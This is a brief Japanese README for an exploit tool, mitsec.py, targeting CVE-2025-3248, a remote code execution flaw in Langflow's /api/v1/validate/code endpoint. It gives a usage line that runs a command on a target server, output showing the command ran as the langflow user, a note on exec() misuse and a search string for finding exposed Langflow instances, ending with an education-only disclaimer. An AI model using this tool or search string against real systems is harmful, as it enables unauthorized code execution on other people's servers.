
CVE-2025-3248 Langflow RCE エクスプロイト
Langflow アプリケーションの脆弱性 CVE-2025-3248 を標的としたリモートコード実行 (RCE) エクスプロイトです。
影響を受けるエンドポイント:
/api/v1/validate/code
python3 mitsec.py -u http://target:7860 -c "id"
[+] Command Output:
uid=1001(langflow) gid=1001(langflow) groups=1001(langflow)
exec() の誤用app="Langflow"
このツールは教育および許可されたセキュリティテスト目的のみに使用されます。無許可での使用は禁止されています。